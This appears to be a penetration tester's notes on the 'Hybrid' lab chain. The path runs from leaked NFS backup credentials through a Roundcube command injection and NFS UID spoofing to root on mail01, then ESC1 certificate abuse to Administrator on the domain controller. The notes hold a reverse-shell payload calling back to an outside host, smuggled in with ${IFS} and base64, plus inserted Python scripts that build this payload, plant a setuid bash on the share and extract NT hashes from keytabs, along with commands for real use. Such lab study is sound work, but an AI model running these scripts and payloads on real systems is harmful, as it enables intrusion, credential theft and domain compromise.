Hybrid (Chain)
This is not a writeup, just my notes about the machine.
Machine information

Operating System: Windows
Chain: True (2 Machines)

Credentials

Username                Password        Source       Service
admin@hybrid.vl         Duckling21      Backup File  Roundcube Webmail
peter.turner@hybrid.vl  PeterIstToll!   Backup File  Roundcube Webmail

✅ Valid Usernames
peter.turner@hybrid.vl

🔑 Passwords list
Duckling21
PeterIstToll!
Information Gathering
Nmap
nmap -p- -A --open -T5 -Pn -n -oN ext_hybrid_tcp_allports -vvv --min-rate 3000 10.10.141.149-150
#10.10.141.149
53/tcp open tcpwrapped syn-ack
135/tcp open tcpwrapped syn-ack
139/tcp open tcpwrapped syn-ack
445/tcp open tcpwrapped syn-ack
3389/tcp open tcpwrapped syn-ack
9389/tcp open tcpwrapped syn-ack
49667/tcp open tcpwrapped syn-ack
49670/tcp open tcpwrapped syn-ack
#10.10.141.150
22/tcp open tcpwrapped syn-ack
25/tcp open tcpwrapped syn-ack
80/tcp open tcpwrapped syn-ack
110/tcp open tcpwrapped syn-ack
111/tcp open tcpwrapped syn-ack
143/tcp open tcpwrapped syn-ack
993/tcp open tcpwrapped syn-ack
995/tcp open tcpwrapped syn-ack
2049/tcp open nfs
35407/tcp open tcpwrapped syn-ack
Initial Enumeration
Enumerating the network file system
showmount -e 10.10.141.150
Export list for 10.10.141.150:
/opt/share *
Mounting the network file system
mkdir share
sudo mount -t nfs 10.10.141.150:/opt/share share -o nolock
cp share/backup.tar.gz .
tar -xvf backup.tar.gz
Discovering leaked credentials in the files from the backup.
tree
.
├── backup.tar.gz
├── etc
│ ├── dovecot
│ │ └── dovecot-users
│ ├── passwd
│ ├── postfix
│ │ └── main.cf
│ └── sssd
│ └── sssd.conf
└── opt
└── certs
└── hybrid.vl
├── fullchain.pem
└── privkey.pem
File: etc/dovecot/dovecot-users
-------------------------------
admin@hybrid.vl:{plain}Duckling21
peter.turner@hybrid.vl:{plain}PeterIstToll!
Roundcube enumeration
Discovering a vulnerable plugin

Exploitation
Modifying the user's identity email field to trigger the RCE. The base64 blob decodes to /bin/sh -i >& /dev/tcp/10.8.5.48/1234 0>&1, and ${IFS} stands in for every space so the injected value contains no literal whitespace; the & characters terminate whatever command the address is interpolated into and start the injected one.
peter.turner&echo${IFS}L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUuNDgvMTIzNCAwPiYx${IFS}|${IFS}base64${IFS}-d${IFS}|bash&@hybrid.vl
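The payload above, built and decoded programmatically. This is an added example and not code from the original notes; it assumes only that the injected value must contain no literal whitespace (hence ${IFS}) and that the domain part stays hybrid.vl. decode_injected_command is the defensive counterpart: given a captured identity email field it recovers the command the target would run.

```python
"""Added example: build and decode the ${IFS} reverse-shell payload used in
the Roundcube identity email field. Not part of the original notes."""
import base64
import re

IFS = "${IFS}"   # bash expands this to the default field separator, i.e. a space


def reverse_shell(lhost: str, lport: int) -> str:
    """Plain bash reverse shell, exactly the string that is base64-encoded."""
    return f"/bin/sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def build_identity_email(local_part: str, lhost: str, lport: int,
                         domain: str = "hybrid.vl") -> str:
    """local&<cmd>&@domain: each & ends the surrounding shell command and
    starts a new one; base64 avoids quotes and redirect characters in the
    field, and ${IFS} replaces every space so no literal whitespace appears."""
    b64 = base64.b64encode(reverse_shell(lhost, lport).encode()).decode()
    cmd = f"echo{IFS}{b64}{IFS}|{IFS}base64{IFS}-d{IFS}|bash"
    payload = f"{local_part}&{cmd}&@{domain}"
    # Sanity check: a single literal space would break the injection.
    assert not any(ch.isspace() for ch in payload)
    return payload


def decode_injected_command(value: str):
    """Recover the command hidden in a captured identity email value, or
    None when the value carries no echo${IFS}<base64>${IFS} stage."""
    m = re.search(r"echo\$\{IFS\}([A-Za-z0-9+/=]+)\$\{IFS\}", value)
    return base64.b64decode(m.group(1)).decode() if m else None


if __name__ == "__main__":
    p = build_identity_email("peter.turner", "10.8.5.48", 1234)
    print(p)
    print(decode_injected_command(p))
```

Run it to reproduce the exact value from the notes; swapping lhost and lport regenerates the blob for another listener.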

Lateral Movement to peter.turner
Abusing UID Spoofing and NFS Share
Attack Path:
To move from www-data to peter.turner, the tester leveraged the NFS export (/opt/share, exported to everyone as shown by showmount) together with a spoofed UID on the attacker's machine. The trick works because an NFS export with the default AUTH_SYS flavour trusts the numeric UID presented by the client, and root squashing does not interfere since the spoofed UID is not root. The exploitation flow was as follows:
1. UID Spoofing: on the attacker's machine, a local user was created with the same UID as the target user peter.turner@hybrid.vl (UID 902601108), so that files written through the NFS mount by that user are owned by peter.turner's UID on the server:
sudo useradd -u 902601108 peter.turner@hybrid.vl --badname -p 'password123'
2. Abusing the NFS share with www-data: the compromised www-data account had write access to the exported directory on mail01, and a copy of the Bash binary was placed into the share from this account.
3. Setting the SetUID bit (on the attacker's machine): as the spoofed user, the tester moved the Bash binary out of the mounted share into a temporary directory (e.g., /tmp), which leaves a copy owned by UID 902601108, set the setuid bit, and moved it back into the NFS directory (mv keeps both the owner and the setuid bit):
chmod u+s bash
mv bash /path/to/nfs/share/
4. Privilege Escalation: back on the target machine, the www-data account executed the Bash binary with the -p flag, which makes Bash keep the effective UID instead of dropping it to the real UID:
./bash -p
This resulted in a shell running with the effective UID of peter.turner@hybrid.vl, i.e. lateral movement to that user on mail01.
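The attacker-side step of the procedure above as a script, including the check a practitioner wants before running ./bash -p on the target: the file on the share must be owned by the spoofed UID, executable, and setuid. This is an added example, not code from the original notes; it assumes it is run as the spoofed local user with the share already mounted at the path given, and run_local_demo() exercises the same logic in a temporary directory so it can be tried without NFS.

```python
"""Added example: plant a setuid copy of bash on an NFS share from a host
where a user with the victim's UID exists, and verify the result.
Not part of the original notes."""
import os
import shutil
import stat
import tempfile

TARGET_UID = 902601108   # peter.turner@hybrid.vl on mail01, from the notes


def is_suid_owned_by(path: str, uid: int) -> bool:
    """True when PATH is owned by UID, user-executable and setuid: the state
    the binary must be in on the server for `./bash -p` to yield that UID."""
    st = os.stat(path)
    return (st.st_uid == uid
            and bool(st.st_mode & stat.S_ISUID)
            and bool(st.st_mode & stat.S_IXUSR))


def plant_suid(share: str, name: str = "bash") -> bool:
    """Re-create the www-data-owned copy in SHARE as the current (spoofed)
    user in a temp dir, set u+s, and move it back over the original.
    The copy makes the new inode ours; mv keeps owner and mode bits, so the
    server then sees a setuid binary owned by our UID."""
    src = os.path.join(share, name)
    tmp_dir = tempfile.mkdtemp()
    tmp = os.path.join(tmp_dir, name)
    try:
        shutil.copy2(src, tmp)
        os.chmod(tmp, 0o4755)        # rwsr-xr-x
        shutil.move(tmp, src)
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)
    return is_suid_owned_by(src, os.getuid())


def run_local_demo() -> dict:
    """Simulate the whole thing in a temp directory (constructed stand-in
    for the share, no NFS needed) and report the before/after state."""
    share = tempfile.mkdtemp()
    target = os.path.join(share, "bash")
    try:
        with open(target, "wb") as f:
            f.write(b"#!/bin/sh\necho fake bash\n")   # stand-in for the binary www-data placed
        os.chmod(target, 0o755)
        before = is_suid_owned_by(target, os.getuid())
        after = plant_suid(share)
        mode = stat.S_IMODE(os.stat(target).st_mode)
    finally:
        shutil.rmtree(share, ignore_errors=True)
    return {"before": before, "after": after, "mode": mode}


if __name__ == "__main__":
    print(run_local_demo())
    # Real use, as the spoofed user: plant_suid("/path/to/mounted/share")
    # and then check is_suid_owned_by(".../share/bash", TARGET_UID).
```

Against the real share, call plant_suid with the mount point and confirm is_suid_owned_by(path, TARGET_UID) is True from the client side; the same ownership and mode are what ls -ln will show from www-data's shell on mail01.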
Privilege Escalation to root on mail01
Finding a KeePass database
Inside peter.turner@hybrid.vl's home directory there was a KeePass database file. I moved it to my machine and extracted the credentials thanks to credential reuse.
❯ kpcli --kdb=passwords.kdbx
Provide the master password: *************************
kpcli:/> cd hybrid.vl
kpcli:/hybrid.vl> ls
=== Entries ===
0. domain
1. mail mail01.hybrid.vl
kpcli:/hybrid.vl> show 0
Title: domain
Uname: peter.turner
Pass: b0cwR+G4Dzl_rw
URL:
Notes:
Abusing the sudoers configuration
peter.turner@hybrid.vl@mail01:~$ sudo -l
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#
Compromising the Domain Controller
Discovering that Domain Computers can enroll in the HybridComputers template, which is vulnerable to ESC1
❯ certipy-ad find -u peter.turner -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.219.181 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : hybrid-DC01-CA
DNS Name : dc01.hybrid.vl
Certificate Subject : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
Certificate Serial Number : 7D22C8F2760BC48A4E57B5E94984304B
Certificate Validity Start : 2023-06-17 14:04:39+00:00
Certificate Validity End : 2125-04-03 23:35:28+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : HYBRID.VL\Administrators
Access Rights
ManageCertificates : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
ManageCa : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
Enroll : HYBRID.VL\Authenticated Users
Certificate Templates
0
Template Name : HybridComputers
Display Name : HybridComputers
Certificate Authorities : hybrid-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : HYBRID.VL\Domain Admins
HYBRID.VL\Domain Computers
HYBRID.VL\Enterprise Admins
Object Control Permissions
Owner : HYBRID.VL\Administrator
Write Owner Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Dacl Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Property Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
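The ESC1 criteria applied to the template attributes as Certipy prints them, so the HybridComputers finding can be reproduced and compared with a hardened variant. This is an added example and not Certipy's own code or the original notes; the Template fields are transcribed from the certipy find output above, and the list of low-privileged principals is an assumption of this example that should be tuned per environment. Note that the CA-level "User Specified SAN : Disabled" line does not protect against this: that flag governs ESC6, whereas ESC1 comes from the template's EnrolleeSuppliesSubject flag.

```python
"""Added example: ESC1 check over certificate template attributes.
Not part of the original notes and not part of Certipy."""
from dataclasses import dataclass, replace

# Groups that any domain-joined machine or domain user belongs to (assumption).
LOW_PRIV_PRINCIPALS = {
    "HYBRID.VL\\Domain Computers",
    "HYBRID.VL\\Domain Users",
    "HYBRID.VL\\Authenticated Users",
    "Everyone",
}
# EKUs that let a certificate authenticate a principal via PKINIT/Schannel.
CLIENT_AUTH_EKUS = {
    "Client Authentication",
    "PKINIT Client Authentication",
    "Smart Card Logon",
    "Any Purpose",
}


@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool
    requires_manager_approval: bool
    authorized_signatures_required: int
    extended_key_usage: frozenset
    enrollment_rights: frozenset


def esc1_enrollers(t: Template) -> set:
    """Low-privileged principals that can abuse T for ESC1 (empty = not ESC1).
    ESC1 needs all of: template enabled, requester chooses the subject/SAN,
    no manager approval, no authorized signatures, an EKU usable for client
    authentication (an empty EKU list means any purpose), and enrollment
    rights granted to a low-privileged group."""
    if not t.enabled or not t.enrollee_supplies_subject:
        return set()
    if t.requires_manager_approval or t.authorized_signatures_required > 0:
        return set()
    if t.extended_key_usage and not (t.extended_key_usage & CLIENT_AUTH_EKUS):
        return set()
    return set(t.enrollment_rights) & LOW_PRIV_PRINCIPALS


def harden(t: Template) -> Template:
    """The usual fix: stop the enrollee from choosing the subject and
    require CA manager approval for any remaining enrollments."""
    return replace(t, enrollee_supplies_subject=False, requires_manager_approval=True)


def with_changes(t: Template, **changes) -> Template:
    """Copy of T with some attributes changed (for what-if checks)."""
    return replace(t, **changes)


# Transcribed from the certipy find output above.
HYBRID_COMPUTERS = Template(
    name="HybridComputers",
    enabled=True,
    enrollee_supplies_subject=True,
    requires_manager_approval=False,
    authorized_signatures_required=0,
    extended_key_usage=frozenset({"Client Authentication", "Server Authentication"}),
    enrollment_rights=frozenset({
        "HYBRID.VL\\Domain Admins",
        "HYBRID.VL\\Domain Computers",
        "HYBRID.VL\\Enterprise Admins",
    }),
)

if __name__ == "__main__":
    print("ESC1 enrollers:", esc1_enrollers(HYBRID_COMPUTERS))
    print("after hardening:", esc1_enrollers(harden(HYBRID_COMPUTERS)))
```

esc1_enrollers returns exactly the group that made the chain work: MAIL01$, as a domain-joined computer, is a member of Domain Computers.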
Extracting the MAIL01$ computer account NT hash from the host keytab (krb5.keytab, copied from mail01 as root) to abuse ESC1. Every domain-joined computer account is a member of Domain Computers, which is exactly the group holding enrollment rights on HybridComputers.
python3 keytabextract.py /home/Intrusionz3r0/Documents/Hybrid/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
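What keytabextract.py does under the hood: the MIT krb5 keytab is a flat binary format, and the rc4-hmac key it stores for an Active Directory account is the account's NT hash. The parser below is an added example, not keytabextract.py and not code from the original notes. It constructs its own keytab bytes (build_keytab exists only to keep the example self-contained) using the MAIL01$ key values shown in the output above, then parses them back.

```python
"""Added example: minimal parser for the MIT krb5 keytab format (version
0x0502). Not part of the original notes and not keytabextract.py."""
import struct
from dataclasses import dataclass

RC4_HMAC, AES128, AES256 = 23, 17, 18
ENCTYPE_NAMES = {
    RC4_HMAC: "rc4-hmac",                   # key == NT hash for AD accounts
    AES128: "aes128-cts-hmac-sha1-96",
    AES256: "aes256-cts-hmac-sha1-96",
}


@dataclass
class KeytabEntry:
    principal: str
    enctype: int
    key: bytes
    kvno: int


def _counted(buf: bytes, off: int):
    """counted_octet_string: uint16 big-endian length followed by the bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    off += 2
    return buf[off:off + n], off + n


def parse_keytab(data: bytes) -> list:
    if data[:2] != b"\x05\x02":
        raise ValueError("only keytab version 0x0502 (big-endian) is supported")
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:                 # negative size marks a deleted slot of |size| bytes
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _counted(data, off)
        comps = []
        for _ in range(ncomp):
            comp, off = _counted(data, off)
            comps.append(comp.decode())
        _name_type, _timestamp, vno8 = struct.unpack_from(">IIB", data, off)
        off += 9
        (etype,) = struct.unpack_from(">H", data, off)
        off += 2
        key, off = _counted(data, off)
        kvno = vno8
        if end - off >= 4:           # optional 32-bit kvno overrides vno8 when non-zero
            (kvno32,) = struct.unpack_from(">I", data, off)
            if kvno32:
                kvno = kvno32
        off = end
        entries.append(KeytabEntry("/".join(comps) + "@" + realm.decode(), etype, key, kvno))
    return entries


def extract_keys(data: bytes) -> dict:
    """Map enctype name -> hex key; the rc4-hmac entry is the NT hash."""
    return {ENCTYPE_NAMES.get(e.enctype, str(e.enctype)): e.key.hex()
            for e in parse_keytab(data)}


def build_keytab(principal: str, realm: str, keys: dict, kvno: int = 2,
                 timestamp: int = 0) -> bytes:
    """Serialise one entry per key in the layout parse_keytab reads (fixture)."""
    out = bytearray(b"\x05\x02")
    comps = principal.split("/")
    for etype, key in keys.items():
        body = struct.pack(">H", len(comps))
        body += struct.pack(">H", len(realm)) + realm.encode()
        for c in comps:
            body += struct.pack(">H", len(c)) + c.encode()
        body += struct.pack(">IIB", 1, timestamp, kvno & 0xFF)   # NT-PRINCIPAL, timestamp, vno8
        body += struct.pack(">HH", etype, len(key)) + key
        body += struct.pack(">I", kvno)
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


# Constructed fixture with the key values from the keytabextract output above.
SAMPLE_KEYTAB = build_keytab("MAIL01$", "HYBRID.VL", {
    RC4_HMAC: bytes.fromhex("0f916c5246fdbc7ba95dcef4126d57bd"),
    AES256: bytes.fromhex("eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e"),
    AES128: bytes.fromhex("3a732454c95bcef529167b6bea476458"),
})

if __name__ == "__main__":
    for e in parse_keytab(SAMPLE_KEYTAB):
        print(e.principal, ENCTYPE_NAMES.get(e.enctype), e.kvno, e.key.hex())
```

On a real host, pass open("/etc/krb5.keytab", "rb").read() to extract_keys; the rc4-hmac value is what goes into certipy's -hashes argument, and the AES keys can be used with -aes where RC4 is disabled.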
Abusing ESC1 to compromise the domain controller: enrolling as MAIL01$ in the HybridComputers template while supplying Administrator as the UPN in the SAN. Certipy notes that the issued certificate carries no object SID; a DC enforcing strong certificate mapping (KB5014754) would refuse to map such a certificate to the Administrator account, so this step relies on the DC still accepting a UPN-only mapping.
❯ certipy-ad req -u 'MAIL01$' -hashes :0f916c5246fdbc7ba95dcef4126d57bd -dc-ip 10.10.219.181 -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Requesting Administrator's Ticket Granting Ticket (TGT) via PKINIT with the certificate; Certipy also recovers the account's NT hash from the resulting ticket.
❯ certipy-ad auth -username Administrator -dc-ip 10.10.219.181 -pfx administrator.pfx -domain hybrid.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dc
Obtaining a shell as Administrator on DC01
❯ impacket-wmiexec hybrid.vl/Administrator@10.10.219.181 -hashes :60701e8543c9f6db1a2af3217386d3dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
hybrid\administrator
C:\>hostname
dc01
C:\>